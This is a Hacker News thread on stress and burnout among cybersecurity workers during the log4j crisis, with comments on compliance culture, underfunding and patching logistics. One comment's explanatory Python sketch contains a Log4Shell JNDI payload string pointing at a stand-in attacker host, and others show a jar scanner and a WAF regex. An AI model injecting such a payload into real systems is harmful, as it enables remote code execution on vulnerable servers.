item 29552136

Ask HN: Are Cybersecurity Workers Ok?

106 points | Victerius | 4 years ago

In the last 12 months we have seen the SolarWinds hack, the Microsoft Exchange Server data breach, and since Friday, Log4j. I'm reading an article on CNN about the US government's response to Log4j.

"Organizations are now in a race against time to figure out if they have computers running the vulnerable software that were exposed to the internet. Cybersecurity executives across government and industry are working around the clock on the issue."

""For most of the information technology world, there was no weekend," Rick Holland, chief information security officer at cybersecurity firm Digital Shadows, told CNN. "It was just another long set of days.""

The sysadmin subreddit is also full of professionals talking about the problem.

With so many large scale hacks, 0-days, and breaches happening these days, are cybersecurity professionals ok? Have studies about the mental health and anxiety levels of this group of professionals been conducted?

136 comments

[+] dmhmr|4 years ago|reply
The past few years have soured me on how many organizations run cybersecurity in general. The industry is full of individuals who do not understand the tech they are protecting, and often they barely understand the security tech they use daily. A lot of places are simply doing compliance check-marking and barely have a shred of technical aptitude. They struggle with basic fundamentals like inventory and patch management. It is an industry that is hard to stay upbeat about if you are looking at anything larger than how it benefits your personal paycheck. If you want insight into the reality of how the government operates, just look at the GAO reports; they are alarming: https://www.gao.gov/highrisk/ensuring-cybersecurity-nation
[+] Bhilai|4 years ago|reply
Add to that the general lack of education around cybersecurity: hardly any mainstream CS program teaches security as a mandatory course. We have CS PhD engineers who are experts in their domains but struggle to understand basic security concepts. We need to educate engineers to care about the security of their code and systems just as they care about performance, reliability, maintainability, etc.

The problem is further exacerbated by a class of people who received their MBAs and think they know it all. Just yesterday, a lead product manager was arguing with security folks about why his service needs to be patched for the log4j vuln if it's not internet facing. He had trouble fathoming that even though his service is not internet facing, it processes and logs user-controlled data.
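That internal-only argument misses how lookup expansion works. Here's a toy sketch in pure Python, with a hypothetical `expand_lookups` function standing in for log4j's `${...}` substitution (not the real library), showing that the *data*, not the format string, is what triggers the lookup:

```python
import re

# Toy stand-in for log4j's "${...}" lookup expansion. Vulnerable log4j
# versions resolved lookups like ${jndi:ldap://...} at log time; this
# sketch just shows the substitution mechanic, not real code loading.
LOOKUP = re.compile(r"\$\{([^}]+)\}")

def expand_lookups(message: str) -> str:
    def resolve(match: re.Match) -> str:
        scheme = match.group(1).split(":", 1)[0]
        if scheme == "jndi":
            # In vulnerable versions, this is the point where a remote
            # object could be fetched and code executed.
            return f"<would dereference {match.group(1)}!>"
        return match.group(0)
    return LOOKUP.sub(resolve, message)

# An internal service logging a header forwarded by an edge service:
user_agent = "${jndi:ldap://attacker.example/a}"
log_line = expand_lookups(f"request from agent {user_agent}")
```

The service never talks to the internet directly; it only has to *log* a string that an internet-facing system passed along.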

Look at the recent Azure vulns. I am pretty sure their internal security team knew about these, and after some back and forth some exec probably signed off on an exception. They would rather ship features than fix the mess they created. Most infosec folks have trouble getting teams to prioritize security work, and some of the blame falls on infosec teams too, for making everything sound like an end-of-the-world scenario. But did Azure lose a single customer, did the stock price go down, was there any loss of revenue? Nope. So what's the point of investing so much in security if the only real harm was some loss of reputation?

Even most security execs I have had a chance to interact with don't understand security topics properly; sure, they can throw some jargon around in all-hands meetings and such. Unless they come from a security background, these execs often confuse security with compliance, and instead of investing in defense-in-depth techniques they look for check-boxes against security controls.

[+] phoehne|4 years ago|reply
Have you ever worked with someone in information security, only to find out they're checking off boxes but don't know what they're doing? Has it been scanned by this piece of software (which produces 832 false positives) with a remediation plan provided? Has everyone taken the online cybersecurity training? Do you have a documented architecture? Are you using the approved software versions (only they didn't get the memo that we've moved on from Java 1.8)?

I once had to argue back and forth with someone (circa 2008) that JavaScript did not mean "mobile code" in the sense of their checklist. I had to explain what JavaScript was and how it worked, but they were still more than willing to tell me I had to remove it from the app I was working on, which would have rendered my app, and all the other apps for that client, much less functional.

[+] ransom1538|4 years ago|reply
This. The only person I would trust is someone who was a sysadmin for at least 10 years and then decided to specialize in security for another 5. So you are looking at a minimum of 15 years of experience to be decent. Without deep sysadmin skills, I am at a loss as to what they would contribute. You are going to update our firewall without understanding what CIDR notation is? You are going to create a VPC for the dev environment without knowing what a subnet mask is? You are going to monitor security across thousands of VMs with no cloud background? Security is a deeply specialized field. Not only that, you need to be a bit of a bully: you are always fighting PMs for more time to vet things and patch things, all while being a cost center.

Why do we have so many security disasters? Because those people are rare unicorns, ridiculously expensive, with no way to show added value.
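For what it's worth, the fundamentals being tested above are a few lines of standard library; the gap is knowing what they mean. A sketch with Python's `ipaddress` module (the 10.20.0.0/22 VPC is just an illustrative address block):

```python
import ipaddress

# CIDR notation encodes a network address plus a prefix length.
# A /22 leaves 10 host bits, so 2**10 = 1024 addresses.
vpc = ipaddress.ip_network("10.20.0.0/22")
print(vpc.netmask)        # 255.255.252.0
print(vpc.num_addresses)  # 1024

# Carve the dev environment out as one of four /24 subnets.
subnets = list(vpc.subnets(new_prefix=24))
dev = subnets[0]
print(dev)                                      # 10.20.0.0/24
print(ipaddress.ip_address("10.20.1.7") in dev) # False: it's in 10.20.1.0/24
```

If you can't predict those outputs, a firewall rule or VPC route you write is a guess.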

[+] formerly_proven|4 years ago|reply
Most jobs in "cybersecurity" are essentially there for CYA purposes, not for improving security in any meaningful sense. Indeed, deploying "security measures" for managerial CYA purposes results in things actively detrimental to security, like widely deployed, invasive snake oil, among many other things.
[+] asdfsd234234444|4 years ago|reply
That's because having good security doesn't make you more money.
[+] CommanderData|4 years ago|reply
I had our sec team try to blanket-ban base64 strings on our WAF in response to log4shell. I'm talking body, URL, everything.

The reasoning was that we probably don't use base64. I was amazed.
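A blanket ban like that is almost guaranteed to break legitimate traffic, because the base64 alphabet is just `[A-Za-z0-9+/]`. A quick sketch of the kind of naive rule such a ban amounts to (the regex is a hypothetical approximation, not any real WAF's):

```python
import re

# A naive "looks like base64" rule: 8+ chars from the base64 alphabet,
# optionally padded with "=". Roughly what a blanket ban ends up matching.
B64ISH = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")

candidates = ["c2VjcmV0cw==", "password", "checkout", "AAAABBBB",
              "hello", "log4shell"]
flagged = [c for c in candidates if B64ISH.match(c)]
# Ordinary request fields like "password" and "checkout" get blocked
# right alongside the one actual base64 payload.
```

Five of those six strings match, and only one of them is real base64.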

[+] antihero|4 years ago|reply
> A lot of places are simply doing compliance check-marking and barely have a shred of technical aptitude.

Why would they? Does capitalism incentivise "caring" on a technical and ethical level about doing the right thing, or does it incentivise spending the minimum amount of resources to be covered by insurance and not criminally liable for anything? If they did the "right thing", someone in management is wasting resources.

Of course, if your company is private and the shareholders are decent enough people to make sure the board is doing things properly, this can work. With public companies, I don't see how it is remotely feasible.

We have to legislate to compel companies to do this and expand the definition of negligence, which itself is quite complex. Make the people at the very highest levels criminally liable for breaches that happen due to lax, box checking behaviour on their watch. It is the only way.

[+] jabroni_salad|4 years ago|reply
You really have to have a zen mindset and refuse to let these outside issues control you. There is infinite bad shit out there and you can work for years and barely make a dent in it. That is just how it is.

Personally, I am helped by being on the client-services side. It constantly amazes me the kind of risk a business is willing to accept for barely anything in return, and if I actually had a personal stake in what I am seeing at clients, I think I would be much more stressed.

Also, the issue is not just 'are security professionals ok'. Good security starts with good operations, and good operations is a rarity. We need devs to ship products that can run with least privileges and have secure defaults. We need operators to have a good understanding of their own environment and to design things on purpose rather than just improvising. We need security people that can offer more guidance than just printing out a nessus scan. We need business analysts who are pragmatic with concessions and who are willing to spend the resources needed to do things right the first time.

[+] lbriner|4 years ago|reply
I think a big issue, from what people are saying, is that it has somehow become an infosec employee's fault that the system is not secure. This is about managing boundaries, and it happens in many disciplines. My wife struggles as a solicitor with unending demands on her time and guilt-trips of "this agreement needs to be done by Friday", and for some reason people get upset if the response is "you should have given me four weeks' notice".

The landscape is desperate, with hundreds of apps, servers, networks, employees, etc. in most companies. The tooling is difficult or expensive or both; how many people allow outgoing firewall traffic by default because it is too complicated to whitelist everything that needs to go out? Even with the best will in the world, basic things like Windows updates, SSL cert renewals (no, we can't all use Let's Encrypt), and Linux updates can be a full-time role.

But to be fair, our industry is still quite immature. We do not have the regulatory backing across the globe to assure all products are developed securely. We use open-source libraries with barely any checks (and what would we check anyway?), and IT is mostly intangible, so how do we even know what we are doing?

This sounds doom and gloom but I think every industry has a Wild West stage that teaches people what is and isn't important and allows industries and products to mature eventually to something that is sustainable.

[+] jodrellblank|4 years ago|reply
> "somehow it has become an infosec's employee's fault that the system is not secure."

Yet, it still isn't. Elsewhere someone mentioned doctors, and by comparison a doctor must pass nationally recognised exams, afterwards take personal responsibility for what they do every day, hold malpractice insurance, and risk being struck off the medical register and forbidden from practising again for e.g. incompetence, unethical behaviour, or malpractice. What are the equivalents of these in cybersecurity?

Customers or users whose data is stolen in a hack, employees who lost their jobs to a ransomware attack shutting down a company: what equivalent of "medical malpractice" lawsuits can they bring against the infosec team that was employed and paid to keep them safe? Can the harmed people even determine whether the infosec team acted unethically or incompetently vs. sensibly? What reassurance can they take when the infosec employee says "I told them I shouldn't be opening this connection and they made me, so it's not my fault"? Imagine a surgeon performing a surgery they disagree with on a patient because non-medically-qualified hospital management told them to. What happens to the security teams who incompetently fail to protect against those harms and then carry on to their next job without any obligation to disclose their association? What board of reasonably trusted people is overseeing them, holding them to account; what register can they be struck off? It's "mistakes were made" all the way up to the CEO.

I don't agree that it's the infosec employee's fault. (Insert popular civil engineering/bridge design comparison here, and the need for a competent qualified senior engineer to sign their name against a design which they can personally be held responsible for).

[+] davewritescode|4 years ago|reply
No, we’re not. I will tell you, this year I’ve dealt with more security incidents than in my entire career combined.

My organization takes security seriously, but at the end of the day we serve customers who don’t. That’s been the bulk of our issues this year.

log4shell has just been the icing on the cake.

[+] ackbar03|4 years ago|reply
Are you at least getting paid better?
[+] bluedino|4 years ago|reply
As a cybersecurity person, what do you do about log4j?

1. Try to identify if you are vulnerable

2. Inform people in your company

3. Contact vendors of vulnerable products and ask for a patch

4. Have sysadmins install said patch

Cybersecurity people don't do anything. You're not patching. You're not finding the new flaws. You're reactively trying to solve problems when they make the news.
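Step 1 in practice looked something like the following minimal sketch (the `find_vulnerable_jars` helper is hypothetical; it is filename-based only, so it misses shaded/fat jars and renamed copies, and the version check is a simplification of the CVE-2021-44228 affected range):

```python
import re
from pathlib import Path

# Matches jar names like "log4j-core-2.14.1.jar". Purely name-based,
# so log4j repackaged inside an uber-jar will not be found this way.
LOG4J_JAR = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")

def find_vulnerable_jars(root):
    hits = []
    for jar in Path(root).rglob("*.jar"):
        m = LOG4J_JAR.search(jar.name)
        if not m:
            continue
        version = tuple(int(p) for p in m.groups())
        # CVE-2021-44228 affected 2.0 <= version < 2.15.0 (simplified;
        # the real advisory has more nuance across later CVEs).
        if (2, 0, 0) <= version < (2, 15, 0):
            hits.append((str(jar), ".".join(m.groups())))
    return hits
```

Half the industry was running some variant of this against servers, images, and build caches that weekend, which is exactly the coordination work the comment describes.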

[+] rank0|4 years ago|reply
Hell yeah I’m doing fuckin great. I make almost double what I did two years ago and I’m receiving 20+ job solicitations per week. I believe the ever escalating rate of hacks has dramatically improved the job market from the employees perspective.

Cybersecurity is SUPER broad though and there’s a range of many different roles. I’m a bit surprised all the folks here saying they’re not okay. Best of luck to them and maybe it’s time for a role swap.

I used to work in a SOC so I get it and probably would be struggling if I was still there.

[+] y-c-o-m-b|4 years ago|reply
What are your working hours like?

Also somewhat related - what's the best path for a senior software developer to enter that space? Is the pay the same?

[+] maskull|4 years ago|reply
What do you do now?
[+] jart|4 years ago|reply
I'm not a worker but it sounds similar to the Mad Gadget remote code exec bug in Apache Commons Collections that was discovered five years ago. I wrote a blog post about it. https://opensource.googleblog.com/2017/03/operation-rosehub.... Back when I worked at Google, we sent pull requests to about 2,600 open source projects. The thought never really crossed our minds to blog about it publicly. The problem is that people just kept getting hacked, because these Java core libraries are everywhere. Looking back to Mad Gadget should give us some idea of what to expect. I can't tell for certain but this Log4j RCE could be worse since Apache says it can be triggered not just by the format string but also by the log parameters. However I'm not sure what they mean by LDAP since I wouldn't have thought that'd intersect with a logging library. https://logging.apache.org/log4j/2.x/security.html
[+] flamesofphx|4 years ago|reply
I gave up on continuing into cybersecurity after my first experiences several years ago, though I keep up with people (out of the 15 I knew, 4 have quit, one even going into construction work, and 2 committed suicide). I now consider it the IT janitorial department: with the budget and control the department gets, the only thing you can do is fling feces at the wall (an analogy for the reports on things that need fixing but never get done, because (pick one)):

1. Not budgeted for. 2. Too much downtime (an excuse even on systems that are fully load balanced). 3. "WHHHHHHNNN, but we need that legacy system" (which is real, because if it goes down the whole network does). 4. "This doesn't sound critical, let's bring it up next year." 5. "Because I (non-techy boss man) said we're not going to do it. As a matter of fact, I am going to sue HIPAA, or PCI, or some regulatory agency, for governmental overreach against a proper business."

[+] ivlad|4 years ago|reply
Log4j vulnerability became big news Friday evening. I did not have a weekend. Monday I went to bed at 3AM (technically Tuesday) and I was up at 8. It’s midnight and I am not yet done for the day.

Am I okay?

[+] zaphar|4 years ago|reply
You might not be. Make sure you take some time off after this. You deserve it.
[+] AccountToUse|4 years ago|reply
Hopefully you are hourly at least and make up with sweet overtime. I apologize deeply if you are salaried.
[+] Bhilai|4 years ago|reply
Take rest! There will be another one of these and more work to be done in future.
[+] jhickok|4 years ago|reply
Thank you for your service.
[+] mrweasel|4 years ago|reply
I think it depends on your job. As someone working in operations, I constantly feel that business and developers are pushing solutions far beyond what can be safely supported. With stuff like Docker, Kubernetes, and DevOps, developers have failed to understand that much of the security responsibility has shifted from Ops to Dev. Did I patch the OS? Yes, of course. Did you update your container in the last few months? If not, then why the F… does it matter if I patched the OS?

On the other hand, my colleagues who hunt for hackers, do forensics, and help customers who are or have been attacked are having the time of their lives. Rarely do you see people as excited about their work as these guys were this weekend.

[+] ancode|4 years ago|reply
I work for one of the OS makers, and we have been making a concerted effort to get rid of memory-safety issues across the codebase. I'm not sure if the open-source side of things is attempting similar efforts, but as far as consumer OSes go, I have seen a lot of improvement over the last 10 years.

I feel bad for anyone working in an org that doesn't have the ability to proactively find bugs in their stuff. Lots of places are cheap and don't account for the debt they accrue by not updating their systems. 'If it ain't broke, don't fix it' doesn't apply to software: what you are shipping is always broken. 'Safe' languages are written in unsafe languages. The interpreter has bugs, the VM has bugs, the virtualization stack has bugs, the OS has bugs, the libraries to do everything have bugs. What is there and what is known are both moving targets. If you are not hiring the offensively minded individuals who will find the bugs with or without your support, then you will not know about the bugs until they are out in the wild. If you aren't willing to pay those people, you are accruing debt that will come due later.

[+] ajsmitty|4 years ago|reply
No, No we are not.

There has been serious underspending by companies for cybersecurity for at least a decade now. Companies are slowly waking up to the fact that the security team can't be less than 1% the size of the development team.

Companies have let developers do whatever they want for so long that when infosec comes in and says we need to change this so we have better visibility into what is being used, or how, it's "oh, this will hurt productivity, so no".

The shit I have heard because companies don't want to spend money on cybersecurity, because putting out new features is more important than something that "might" happen. They just keep spending more on endpoint security and letting everything inside do whatever it wants.

And why would they? Bad hacks blow over after a year or two. Equifax is still ticking along; so is Citibank, so is Capital One. Nobody cares if you get hacked; just pay a fine, give it some time, and things will go back to normal.

[+] turminal|4 years ago|reply
The only truly new thing in the last year is that it's in the news. The reality was always full of breaches and security holes. The paragraph you quote is mostly just inflating the issue in a typical journalistic manner.
[+] waihtis|4 years ago|reply
This is somewhat of a bottleneck moment; a lot happening demanding constant attention from the frontline yet budgets & resources are still reasonably bad all around.

Saying bottleneck implies there's expectation of a better future ahead, but so far there's very few repercussions for neglecting this stuff and so it's unclear whether it'll improve or just become worse.

[+] metafex|4 years ago|reply
In my experience of almost a decade in infosec now, no, we're not okay. I don't know any other group where so many people are struggling with burnout or who have developed a drinking habit because of their jobs. Might be selection bias, but this industry eats people alive, more so than others.
[+] giantg2|4 years ago|reply
"Organizations are now in a race against time to figure out if they have computers running the vulnerable software that were exposed to the internet."

Large orgs should already have sufficient documentation as to which packages and versions are in use and what systems pulled them from their proxy repo.

[+] riskable|4 years ago|reply
> Large orgs should already have sufficient documentation as to which packages and versions are in use and what systems pulled them from their proxy repo.

Key word there: "should".

Let's say you have all 50,000 of your applications well documented. You think those docs are all going to be searchable in one place? That's an information-disclosure vulnerability! No, all 50,000 applications' documentation will be siloed and only accessible to the select few people who work on them (you hope).

So now something like the log4j vulnerability crops up: You need to find out which systems are using log4j and what version. Best you can do is ask around... Demand that every application team cough up the details ASAP.

Now let's say you get data (emails) back suggesting that 5,000 applications are using log4j for certain, 1,000 may be using it (they're Java based apps), and you've confirmed that 14,000 most certainly are not using it. That leaves 30,000 applications where you have no idea if they're vulnerable.

You get data from the Artifactory ("proxy repo") team and they tell you, "we have 150,000 servers that have pulled down log4j (various versions)." Well, that's not particularly helpful so you get the raw data and try to correlate servers to applications only to find that's not helpful either: Because multiple "applications" could be using the same server and just because a log4j version was pulled doesn't mean it's actually being used by anything (in production).

After a few days of investigating the issue you find out that some thousands of applications actually are using log4j but it was included as part of a dependency. You tell them to update it.

Then you find out that 10,000 applications at present have no active development teams which explains why you got no response. Then there's an ungodly number of applications where no one has access to the source code anymore, 3rd party applications, etc.

So even if you have a central proxy repo and excellent documentation on all your stuff that doesn't mean it's going to be easy to hunt down and patch everything (that needs to be patched).
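The correlation step alone is a mini data-engineering project. A sketch, with hypothetical file formats and names, of why raw pull data doesn't answer the question:

```python
import csv
import io

# Hypothetical exports: the repo team's pull log maps servers to
# artifacts pulled; the CMDB maps servers to applications, many-to-many.
pull_log = io.StringIO(
    "server,artifact\n"
    "web01,log4j-core-2.14.1\n"
    "web01,guava-30.1\n"
    "batch07,log4j-core-2.11.0\n")
cmdb = io.StringIO(
    "server,application\n"
    "web01,checkout\n"
    "web01,search\n"
    "batch07,reporting\n")

apps_by_server = {}
for row in csv.DictReader(cmdb):
    apps_by_server.setdefault(row["server"], []).append(row["application"])

# A pull only tells you a server *downloaded* log4j, not which of its
# applications (if any) actually loads it in production.
suspects = set()
for row in csv.DictReader(pull_log):
    if row["artifact"].startswith("log4j-core"):
        suspects.update(apps_by_server.get(row["server"], []))
# Two pulls fan out to three suspect apps, with no proof any is live.
```

Now scale that to 150,000 servers, a CMDB that is partly stale, and applications with no owning team, and "we have a proxy repo" stops sounding like an answer.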

[+] digitalsushi|4 years ago|reply
I'm not technically a cybersecurity person, but yeah, I'm working through the holidays to make sure a portfolio of container images, vSphere templates, AMIs, OpenStack Glance images, anywhere log4j can be hiding, is cleaned out or revved up. I'm getting despondent and was really looking forward to my first mental break this year. I'm bad at pushing back, and don't get anything personal out of playing the martyr. I'm good enough at my job to be the person who has to fix it on Christmas, but not important enough to be the person who can refuse to.

I know I'll see half of y'all online with me :-/

[+] lmeyerov|4 years ago|reply
Entry level, on average, churns out in a year. There are other reasons for that too, but it's not a carefree job. I love helping the analysts who use us, but it gets frustrating seeing how they are treated.

Developers make products: they are indirect profit centers, and while everyone sees room for improvement, get treated relatively well.

Conversely, outside of areas like finance, big tech, and government, sec teams get starved and ignored as cost centers. Their event-log DBs (SIEMs) are often designs from 15+ years ago and might even be SQL-based (think MySQL, not BigQuery), if they even have one.

It wasn't fun even before all this; automated attacks met with bad support have been going on for years.

[+] cdot2|4 years ago|reply
I'm not a cybersecurity worker (although I would like to be), but I work with them. There's been a lot of activity, but I wouldn't say they're more stressed than normal. We did have some log4j stuff, but to my knowledge we weren't affected by the Exchange Server or SolarWinds exploits. News companies are generally going to exaggerate and use hyperbolic language ("organizations are now in a race against time") to make things seem as exciting as possible and get more clicks.
[+] toyg|4 years ago|reply
I reckon the scale is simply not linear.

The likes of FAANG or banks have a big target painted on their backs, so they are scrambling for cover. However, the overwhelming majority of other businesses are not under similar pressure, because it's unlikely they will be targeted first, if at all.

I was actually talking about this with a friend who works for a company that provides a few niche services. They've had log4j 1.x in production for eons (also vulnerable to bad remote exploits), and nothing ever happened, simply because hackers are extremely unlikely to target their services. Obviously that doesn't mean they shouldn't upgrade, but the pressure is basically not there, at least until something Really Bad actually happens. He was actually pissed off at his manager making a big deal out of this exploit simply because it ended up in the mainstream press.

[+] ninegunpi|4 years ago|reply
Infosec's emotional climate has always had a certain pessimistic, paranoid, panicky perception from the outside, but I think it is greatly exaggerated.

FUD, bullshit, lack of skilled people, lack of budget, lack of understanding from adjacent departments, chaos, mayhem, overtime, incidents, and a creeping "I'm not sure what's going on" have always been parts of the profession. Learning to accept frustration, constant change, ill-formed perceptions, and rejection is part of the career choice and a selection factor in the long term. Learning to look at the world from a certain angle that is hard to unlearn (especially if you're good at it) is the mental equivalent of a firefighter's calluses.

If you can bear with it all, being on the defensive side, a kind of digital first responder (regardless of where exactly you are in the industry), is a fun job and a calling for some.

(Edits: Typos)